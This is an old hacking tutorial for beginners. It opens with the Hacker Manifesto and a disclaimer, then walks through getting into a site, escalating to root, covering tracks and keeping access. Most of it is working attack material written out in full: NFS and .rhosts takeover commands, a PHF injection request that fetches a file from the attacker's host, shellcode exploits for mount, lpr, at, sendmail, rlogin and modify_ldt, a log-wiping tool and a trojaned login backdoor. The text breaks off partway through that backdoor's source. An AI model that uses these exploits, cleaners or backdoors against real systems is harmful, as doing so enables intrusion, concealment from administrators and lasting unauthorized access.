You bet your ass we're all alike... we've been spoon-fed baby food at school
when we hungered for steak... the bits of meat that you did let slip through
were pre-chewed and tasteless. We've been dominated by sadists, or ignored
by the apathetic. The few that had something to teach found us willing
pupils, but those few are like drops of water in the desert.
This is our world now... the world of the electron and the switch, the beauty
of the baud. We make use of a service already existing without paying for
what could be dirt-cheap if it wasn't run by profiteering gluttons, and you
call us criminals. We explore... and you call us criminals. We seek after
knowledge... and you call us criminals. We exist without skin color, without
nationality, without religious bias... and you call us criminals. You build
atomic bombs, you wage wars, you murder, cheat, and lie to us and try to
make us believe it's for our own good, yet we're the criminals.
Yes, I am a criminal. My crime is that of curiosity. My crime is that of
judging people by what they say and think, not what they look like. My
crime is that of outsmarting you, something that you will never forgive me
for.
I am a hacker, and this is my manifesto. You may stop this individual, but
you can't stop us all... after all, we're all alike.
+++The Mentor+++

Disclaimer:-
i am not liable for any criminal or bad thing which you have done using this message and document. i am giving here for the educational purpose and care should be taken from your side before using this document and please get a written permission from the person before hacking or doing some thing in the network or system.This document is intended for judicial or educational purposes. I have collected these documents and messages from the internet for educational purpose only. always use these documents for doing good only. I don't want to promote computer crime and I'm not responible of your actions in any way. If you want to hack a computer, do the decent thing and ask for permission first. please read and use this for useful purpose only to protect the systems and information from the bad people. always seek permission from the system owner or who ever responcible for the system by written and then go ahead. Give a full report with honestly to the person or company about your experiments and findings from the system. Always Do Good Think Good and Belive Good.

The Newbies-User's Guide to Hacking

The Newbies-User's Guide to Hacking

Disclaimer:-
i am not liable for any criminal or bad thing which you have done using this message and document. i am giving here for the educational purpose and care should be taken from your side before using this document and please get a written permission from the person before hacking or doing some thing in the network or system.This document is intended for judicial or educational purposes. I have collected these documents and messages from the internet for educational purpose only. always use these documents for doing good only. I don't want to promote computer crime and I'm not responible of your actions in any way. If you want to hack a computer, do the decent thing and ask for permission first. please read and use this for useful purpose only to protect the systems and information from the bad people. always seek permission from the system owner or who ever responcible for the system by written and then go ahead. Give a full report with honestly to the person or company about your experiments and findings from the system. Always Do Good Think Good and Belive Good.

User's guide
__________________________

Well, howdi folks... I guess you are all wondering who's this guy (me)
that's trying to show you a bit of everything... ?
Well, I ain't telling you anything of that...
Copyright, and other stuff like this (below).

Copyright and stuff...
______________________

If you feel offended by this subject (hacking) or you think that you could
do better, don't read the below information...
This file is for educational purposes ONLY...;)
I ain't responsible for any damages you made after reading this...(I'm very
serious...)
So this can be copied, but not modified (send me the changes, and if they
are good, I'll include them ).
Don't read it, 'cuz it might be illegal.
I warned you...
If you would like to continue, press .

















Intro: Hacking step by step.
_________________________________________________________________________________

Well, this ain't exactely for begginers, but it'll have to do.
What all hackers has to know is that there are 4 steps in hacking...

Step 1: Getting access to site.
Step 2: Hacking r00t.
Step 3: Covering your traces.
Step 4: Keeping that account.

Ok. In the next pages we'll see exactely what I ment.

Step 1: Getting access.
_______

Well folks, there are several methods to get access to a site.
I'll try to explain the most used ones.
The first thing I do is see if the system has an export list:

mysite:~>/usr/sbin/showmount -e victim.site.com
RPC: Program not registered.

If it gives a message like this one, then it's time to search another way
in.
What I was trying to do was to exploit an old security problem by most
SUN OS's that could allow an remote attacker to add a .rhosts to a users
home directory... (That was possible if the site had mounted their home
directory.
Let's see what happens...


mysite:~>/usr/sbin/showmount -e victim1.site.com
/usr victim2.site.com
/home (everyone)
/cdrom (everyone)
mysite:~>mkdir /tmp/mount
mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/
mysite:~>ls -sal /tmp/mount
total 9
1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./
1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../
1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/
1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/
1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/
1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/
1 -rw------- 1 root root 242 Mar 9 1997 sudoers
1 drwx------ 3 test 100 1024 Oct 8 21:05 test/
1 drwx------ 15 102 100 1024 Oct 20 18:57 rapper/

Well, we wanna hack into rapper's home.
mysite:~>id
uid=0 euid=0
mysite:~>whoami
root
mysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd

We use /bin/csh 'cuz bash leaves a (Damn!) .bash_history and you might
forget it on the remote server...

mysite:~>su - rapper
Welcome to rapper's user.
mysite:~>ls -lsa /tmp/mount/
total 9
1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./
1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../
1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/
1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/
1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/
1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/
1 -rw------- 1 root root 242 Mar 9 1997 sudoers
1 drwx------ 3 test 100 1024 Oct 8 21:05 test/
1 drwx------ 15 rapper daemon 1024 Oct 20 18:57 rapper/

So we own this guy's home directory...

mysite:~>echo "+ +" > rapper/.rhosts
mysite:~>cd /
mysite:~>rlogin victim1.site.com
Welcome to Victim.Site.Com.
SunOs ver....(crap).
victim1:~$

This is the first method...
Another method could be to see if the site has an open 80 port. That would
mean that the site has a web page.
(And that's very bad, 'cuz it usually it's vulnerable).
Below I include the source of a scanner that helped me when NMAP wasn't written.
(Go get it at http://www.dhp.com/~fyodor. Good job, Fyodor).
NMAP is a scanner that does even stealth scanning, so lots of systems won't
record it.

/* -*-C-*- tcpprobe.c */
/* tcpprobe - report on which tcp ports accept connections */
/* IO ERROR, error@axs.net, Sep 15, 1995 */

#include
#include
#include
#include
#include
#include

int main(int argc, char **argv)
{
int probeport = 0;
struct hostent *host;
int err, i, net;
struct sockaddr_in sa;

if (argc != 2) {
printf("Usage: %s hostname\n", argv[0]);
exit(1);
}

for (i = 1; i < 1024; i++) {
strncpy((char *)&sa, "", sizeof sa);
sa.sin_family = AF_INET;
if (isdigit(*argv[1]))
sa.sin_addr.s_addr = inet_addr(argv[1]);
else if ((host = gethostbyname(argv[1])) != 0)
strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr);
else {
herror(argv[1]);
exit(2);
}
sa.sin_port = htons(i);
net = socket(AF_INET, SOCK_STREAM, 0);
if (net < 0) {
perror("\nsocket");
exit(2);
}
err = connect(net, (struct sockaddr *) &sa, sizeof sa);
if (err < 0) {
printf("%s %-5d %s\r", argv[1], i, strerror(errno));
fflush(stdout);
} else {
printf("%s %-5d accepted. \n", argv[1], i);
if (shutdown(net, 2) < 0) {
perror("\nshutdown");
exit(2);
}
}
close(net);
}
printf(" \r");
fflush(stdout);
return (0);
}

Well, now be very carefull with the below exploits, because they usually get
logged.
Besides, if you really wanna get a source file from /cgi-bin/ use this
sintax : lynx http://www.victim1.com//cgi-bin/finger
If you don't wanna do that, then do a :

mysite:~>echo "+ +" > /tmp/rhosts

mysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+
/root/.rhosts" nc -v - 20 victim1.site.com 80

then
mysite:~>rlogin -l root victim1.site.com
Welcome to Victim1.Site.Com.
victim1:~#

Or, maybe, just try to find out usernames and passwords...
The usual users are "test", "guest", and maybe the owner of the site...
I usually don't do such things, but you can...

Or if the site is really old, use that (quote site exec) old bug for
wu.ftpd.
There are a lot of other exploits, like the remote exploits (innd, imap2,
pop3, etc...) that you can find at rootshell.connectnet.com or at
dhp.com/~fyodor.

Enough about this topic. (besides, if you can finger the site, you can
figgure out usernames and maybe by guessing passwords (sigh!) you could get
access to the site).


Step 2: Hacking r00t.
______

First you have to find the system it's running...
a). LINUX
ALL versions:
A big bug for all linux versions is mount/umount and (maybe) lpr.

/* Mount Exploit for Linux, Jul 30 1996

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````"":::::::::
:::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ ::::::
:::::::...........:::...........:::...........::.......:......:.......::::::
:::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::

Discovered and Coded by Bloodmask & Vio
Covin Security 1996
*/

#include
#include
#include
#include
#include

#define PATH_MOUNT "/bin/mount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
__asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

int i;
int ofs = DEFAULT_OFFSET;

buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;

/* fill start of buffer with nops */

memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);

/* stick asm code into the buffer */

for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];

addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;

(void)alarm((u_int)0);
printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
execl(PATH_MOUNT, "mount", buff, NULL);
}

/*LPR exploit:I don't know the author...*/

#include
#include
#include

#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 1023

long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}

void main()
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
int i;

buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i<2;i++)
*(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}


b.) Version's 1.2.* to 1.3.2
NLSPATH env. variable exploit:

/* It's really annoying for users and good for me...
AT exploit gives only uid=0 and euid=your_usual_euid.
*/
#include
#include
#include
#include
#include

#define path "/usr/bin/at"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
__asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

int i;
int ofs = DEFAULT_OFFSET;

buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;


memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);


for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];

addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;

(void)alarm((u_int)0);
printf("AT exploit discovered by me, _PHANTOM_ in 1997.\n");
setenv("NLSPATH",buff,1);
execl(path, "at",NULL);
}

SENDMAIL exploit: (don't try to chmod a-s this one... :) )

/* SENDMAIL Exploit for Linux
*/

#include
#include
#include
#include
#include

#define path "/usr/bin/sendmail"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
__asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff./sh";

char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

int i;
int ofs = DEFAULT_OFFSET;

buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;


memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);


for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];

addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;

(void)alarm((u_int)0);
printf("SENDMAIL exploit discovered by me, _PHANTOM_ in 1997\n");
setenv("NLSPATH",buff,1);
execl(path, "sendmail",NULL);
}

MOD_LDT exploit (GOD, this one gave such a headache to my Sysadmin (ROOT)
!!!)

/* this is a hack of a hack. a valid System.map was needed to get this
sploit to werk.. but not any longer.. This sploit will give you root
if the modify_ldt bug werks.. which I beleive it does in any kernel
before 1.3.20 ..

QuantumG
*/

/* original code written by Morten Welinder.
*
* this required 2 hacks to work on the 1.2.13 kernel that I've tested on:
* 1. asm/sigcontext.h does not exist on 1.2.13 and so it is removed.
* 2. the _task in the System.map file has no leading underscore.
* I am not sure at what point these were changed, if you are
* using this on a newer kernel compile with NEWERKERNEL defined.
* -ReD
*/

#include
#include
#include
#include
#ifdef NEWERKERNEL
#include
#endif
#define __KERNEL__
#include
#include

static inline _syscall1(int,get_kernel_syms,struct kernel_sym *,table);
static inline _syscall3(int, modify_ldt, int, func, void *, ptr, unsigned long, bytecount)


#define KERNEL_BASE 0xc0000000
/* ------------------------------------------------------------------------ */
static __inline__ unsigned char
__farpeek (int seg, unsigned ofs)
{
unsigned char res;
asm ("mov %w1,%%gs ; gs; movb (%2),%%al"
: "=a" (res)
: "r" (seg), "r" (ofs));
return res;
}
/* ------------------------------------------------------------------------ */
static __inline__ void
__farpoke (int seg, unsigned ofs, unsigned char b)
{
asm ("mov %w0,%%gs ; gs; movb %b2,(%1)"
: /* No results. */
: "r" (seg), "r" (ofs), "r" (b));
}
/* ------------------------------------------------------------------------ */
void
memgetseg (void *dst, int seg, const void *src, int size)
{
while (size-- > 0)
*(char *)dst++ = __farpeek (seg, (unsigned)(src++));
}
/* ------------------------------------------------------------------------ */
void
memputseg (int seg, void *dst, const void *src, int size)
{
while (size-- > 0)
__farpoke (seg, (unsigned)(dst++), *(char *)src++);
}
/* ------------------------------------------------------------------------ */
int
main ()
{
int stat, i,j,k;
struct modify_ldt_ldt_s ldt_entry;
FILE *syms;
char line[100];
struct task_struct **task, *taskptr, thistask;
struct kernel_sym blah[4096];

printf ("Bogusity checker for modify_ldt system call.\n");

printf ("Testing for page-size limit bug...\n");
ldt_entry.entry_number = 0;
ldt_entry.base_addr = 0xbfffffff;
ldt_entry.limit = 0;
ldt_entry.seg_32bit = 1;
ldt_entry.contents = MODIFY_LDT_CONTENTS_DATA;
ldt_entry.read_exec_only = 0;
ldt_entry.limit_in_pages = 1;
ldt_entry.seg_not_present = 0;
stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));
if (stat)
/* Continue after reporting error. */
printf ("This bug has been fixed in your kernel.\n");
else
{
printf ("Shit happens: ");
printf ("0xc0000000 - 0xc0000ffe is accessible.\n");
}

printf ("Testing for expand-down limit bug...\n");
ldt_entry.base_addr = 0x00000000;
ldt_entry.limit = 1;
ldt_entry.contents = MODIFY_LDT_CONTENTS_STACK;
ldt_entry.limit_in_pages = 0;
stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));
if (stat)
{
printf ("This bug has been fixed in your kernel.\n");
return 1;
}
else
{
printf ("Shit happens: ");
printf ("0x00000000 - 0xfffffffd is accessible.\n");
}

i = get_kernel_syms(blah);
k = i+10;
for (j=0; j if (!strcmp(blah[j].name,"current") !strcmp(blah[j].name,"_current")) k = j;
if (k==i+10) { printf("current not found!!!\n"); return(1); }
j=k;

taskptr = (struct task_struct *) (KERNEL_BASE + blah[j].value);
memgetseg (&taskptr, 7, taskptr, sizeof (taskptr));
taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) taskptr);
memgetseg (&thistask, 7, taskptr, sizeof (thistask));
if (thistask.pid!=getpid()) { printf("current process not found\n"); return(1); }
printf("Current process is %i\n",thistask.pid);
taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) thistask.p_pptr);
memgetseg (&thistask, 7, taskptr, sizeof (thistask));
if (thistask.pid!=getppid()) { printf("current process not found\n"); return(1); }
printf("Parent process is %i\n",thistask.pid);
thistask.uid = thistask.euid = thistask.suid = thistask.fsuid = 0;
thistask.gid = thistask.egid = thistask.sgid = thistask.fsgid = 0;
memputseg (7, taskptr, &thistask, sizeof (thistask));
printf ("Shit happens: parent process is now root process.\n");
return 0;
};

c.) Other linux versions:
Sendmail exploit:



#/bin/sh
#
#
# Hi !
# This is exploit for sendmail smtpd bug
# (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
# This shell script does a root shell in /tmp directory.
# If you have any problems with it, drop me a letter.
# Have fun !
#
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady ------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
echo 'main() '>>leshka.c
echo '{ '>>leshka.c
echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
echo '} '>>leshka.c
#
#
echo 'main() '>>smtpd.c
echo '{ '>>smtpd.c
echo ' setuid(0); setgid(0); '>>smtpd.c
echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
echo '} '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -axgrep /tmp/smtpdgrep -v greptr -d ' 'tr -cs "[:digit:]" "\n"head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
echo "Now type: /tmp/sh"

SUNOS:
Rlogin exploit:
(arghh!)
#include
#include
#include
#include

#define BUF_LENGTH 8200
#define EXTRA 100
#define STACK_OFFSET 4000
#define SPARC_NOP 0xa61cc013

u_char sparc_shellcode[] =
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";

u_long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}

void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode);

long_p = (u_long *) buf;

for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;

char_p = (u_char *) long_p;

for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];

long_p = (u_long *) char_p;

targ_addr = get_sp() - STACK_OFFSET;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ = targ_addr;

printf("Jumping to address 0x%lx\n", targ_addr);

execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0);
perror("execl failed");
}

Want more exploits? Get 'em from other sites (like rootshell,
dhp.com/~fyodor, etc...).



Step 3: Covering your tracks:
______

For this you could use lots of programs like zap, utclean, and lots of
others...
Watch out, ALWAYS after you cloaked yourself to see if it worked do a:
victim1:~$ who
...(crap)...
victim1:~$ finger
...;as;;sda...
victim1:~$w
...

If you are still not cloaked, look for wtmpx, utmpx and other stuff like
that. The only cloaker (that I know) that erased me even from wtmpx/utmpx
was utclean. But I don't have it right now, so ZAP'll have to do the job.



/*
Title: Zap.c (c) rokK Industries
Sequence: 911204.B

Syztems: Kompiles on SunOS 4.+
Note: To mask yourself from lastlog and wtmp you need to be root,
utmp is go+w on default SunOS, but is sometimes removed.
Kompile: cc -O Zap.c -o Zap
Run: Zap

Desc: Will Fill the Wtmp and Utmp Entries corresponding to the
entered Username. It also Zeros out the last login data for
the specific user, fingering that user will show 'Never Logged
In'

Usage: If you cant find a usage for this, get a brain.
*/

#include
#include
#include
#include
#include
#include
#include

int f;

void kill_tmp(name,who)
char *name,
*who;
{
struct utmp utmp_ent;

if ((f=open(name,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}

void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;

if ((pwd=getpwnam(who))!=NULL) {

if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}

} else printf("%s: ?\n",who);
}

main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_tmp("/etc/utmp",argv[1]);
kill_tmp("/usr/adm/wtmp",argv[1]);
kill_lastlog(argv[1]);
printf("Zap!\n");
} else
printf("Error.\n");
}


Step 4: Keeping that account.
_______

This usually means that you'll have to install some programs to give you
access even if the root has killed your account...
(DAEMONS!!!) =>-@
Here is an example of a login daemon from the DemonKit (good job,
fellows...)
LOOK OUT !!! If you decide to put a daemon, be carefull and modify it's date
of creation. (use touch --help to see how!)


/*
This is a simple trojanized login program, this was designed for Linux
and will not work without modification on linux. It lets you login as
either a root user, or any ordinary user by use of a 'magic password'.
It will also prevent the login from being logged into utmp, wtmp, etc.
You will effectively be invisible, and not be detected except via 'ps'.
*/

#define BACKDOOR "password"
int krad=0;



/* This program is derived from 4.3 BSD software and is
subject to the copyright notice below.

The port to HP-UX has been motivated by the incapability
of 'rlogin'/'rlogind' as per HP-UX 6.5 (and 7.0) to transfer window sizes.

Changes:

- General HP-UX portation. Use of facilities not available
in HP-UX (e.g. setpriority) has been eliminated.
Utmp/wtmp handling has been ported.

- The program uses BSD command line options to be used
in connection with e.g. 'rlogind' i.e. 'new login'.

- HP features left out: logging of bad login attempts in /etc/btmp,
they are sent to syslog

password expiry

'*' as login shell, add it if you need it

- BSD features left out: quota checks
password expiry
analysis of terminal type (tset feature)

- BSD features thrown in: Security logging to syslogd.
This requires you to have a (ported) syslog
system -- 7.0 comes with syslog

'Lastlog' feature.

- A lot of nitty gritty details has been adjusted in favour of
HP-UX, e.g. /etc/securetty, default paths and the environment
variables assigned by 'login'.

- We do *nothing* to setup/alter tty state, under HP-UX this is
to be done by getty/rlogind/telnetd/some one else.

Michael Glad (glad@daimi.dk)
Computer Science Department
Aarhus University
Denmark

1990-07-04

1991-09-24 glad@daimi.aau.dk: HP-UX 8.0 port:
- now explictly sets non-blocking mode on descriptors
- strcasecmp is now part of HP-UX
1992-02-05 poe@daimi.aau.dk: Ported the stuff to Linux 0.12
From 1992 till now (1995) this code for Linux has been maintained at
ftp.daimi.aau.dk:/pub/linux/poe/
*/

/*
* Copyright (c) 1980, 1987, 1988 The Regents of the University of California.
* All rights reserved.
*
* Redistribution and use in source and binary forms are permitted
* provided that the above copyright notice and this paragraph are
* duplicated in all such forms and that any documentation,
* advertising materials, and other materials related to such
* distribution and use acknowledge that the software was developed
* by the University of California, Berkeley. The name of the
* University may not be used to endorse or promote products derived
* from this software without specific prior written permission.
* THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
* WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.
*/

#ifndef lint
char copyright[] =
"@(#) Copyright (c) 1980, 1987, 1988 The Regents of the University of California.\n\
All rights reserved.\n";
#endif /* not lint */

#ifndef lint
static char sccsid[] = "@(#)login.c 5.40 (Berkeley) 5/9/89";
#endif /* not lint */

/*
* login [ name ]
* login -h hostname (for telnetd, etc.)
* login -f name (for pre-authenticated login: datakit, xterm, etc.)
*/

/* #define TESTING */

#ifdef TESTING
#include "param.h"
#else
#include
#endif

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define index strchr
#define rindex strrchr
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#ifdef TESTING
# include "utmp.h"
#else
# include
#endif

#ifdef SHADOW_PWD
#include
#endif

#ifndef linux
#include
#include
#else
struct lastlog
{ long ll_time;
char ll_line[12];
char ll_host[16];
};
#endif

#include "pathnames.h"

#define P_(s) ()
void opentty P_((const char *tty));
void getloginname P_((void));
void timedout P_((void));
int rootterm P_((char *ttyn));
void motd P_((void));
void sigint P_((void));
void checknologin P_((void));
void dolastlog P_((int quiet));
void badlogin P_((char *name));
char *stypeof P_((char *ttyid));
void checktty P_((char *user, char *tty));
void getstr P_((char *buf, int cnt, char *err));
void sleepexit P_((int eval));
#undef P_

#ifdef KERBEROS
#include
#include
char realm[REALM_SZ];
int kerror = KSUCCESS, notickets = 1;
#endif

#ifndef linux
#define TTYGRPNAME "tty" /* name of group to own ttys */
#else
# define TTYGRPNAME "other"
# ifndef MAXPATHLEN
# define MAXPATHLEN 1024
# endif
#endif

/*
* This bounds the time given to login. Not a define so it can
* be patched on machines where it's too small.
*/
#ifndef linux
int timeout = 300;
#else
int timeout = 60;
#endif

struct passwd *pwd;
int failures;
char term[64], *hostname, *username, *tty;

char thishost[100];

#ifndef linux
struct sgttyb sgttyb;
struct tchars tc = {
CINTR, CQUIT, CSTART, CSTOP, CEOT, CBRK
};
struct ltchars ltc = {
CSUSP, CDSUSP, CRPRNT, CFLUSH, CWERASE, CLNEXT
};
#endif

char *months[] =
{ "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug",
"Sep", "Oct", "Nov", "Dec" };

/* provided by Linus Torvalds 16-Feb-93 */
void
opentty(const char * tty)
{
int i;
int fd = open(tty, O_RDWR);

for (i = 0 ; i < fd ; i++)
close(i);
for (i = 0 ; i < 3 ; i++)
dup2(fd, i);
if (fd >= 3)
close(fd);
}

int
main(argc, argv)
int argc;
char **argv;
{
extern int errno, optind;
extern char *optarg, **environ;
struct timeval tp;
struct tm *ttp;
struct group *gr;
register int ch;
register char *p;
int ask, fflag, hflag, pflag, cnt;
int quietlog, passwd_req, ioctlval;
char *domain, *salt, *ttyn, *pp;
char tbuf[MAXPATHLEN + 2], tname[sizeof(_PATH_TTY) + 10];
char *ctime(), *ttyname(), *stypeof();
time_t time();
void timedout();
char *termenv;

#ifdef linux
char tmp[100];
/* Just as arbitrary as mountain time: */
/* (void)setenv("TZ", "MET-1DST",0); */
#endif

(void)signal(SIGALRM, timedout);
(void)alarm((unsigned int)timeout);
(void)signal(SIGQUIT, SIG_IGN);
(void)signal(SIGINT, SIG_IGN);

(void)setpriority(PRIO_PROCESS, 0, 0);
#ifdef HAVE_QUOTA
(void)quota(Q_SETUID, 0, 0, 0);
#endif

/*
* -p is used by getty to tell login not to destroy the environment
* -f is used to skip a second login authentication
* -h is used by other servers to pass the name of the remote
* host to login so that it may be placed in utmp and wtmp
*/
(void)gethostname(tbuf, sizeof(tbuf));
(void)strncpy(thishost, tbuf, sizeof(thishost)-1);
domain = index(tbuf, '.');

fflag = hflag = pflag = 0;
passwd_req = 1;
while ((ch = getopt(argc, argv, "fh:p")) != EOF)
switch (ch) {
case 'f':
fflag = 1;
break;

case 'h':
if (getuid()) {
(void)fprintf(stderr,
"login: -h for super-user only.\n");
exit(1);
}
hflag = 1;
if (domain && (p = index(optarg, '.')) &&
strcasecmp(p, domain) == 0)
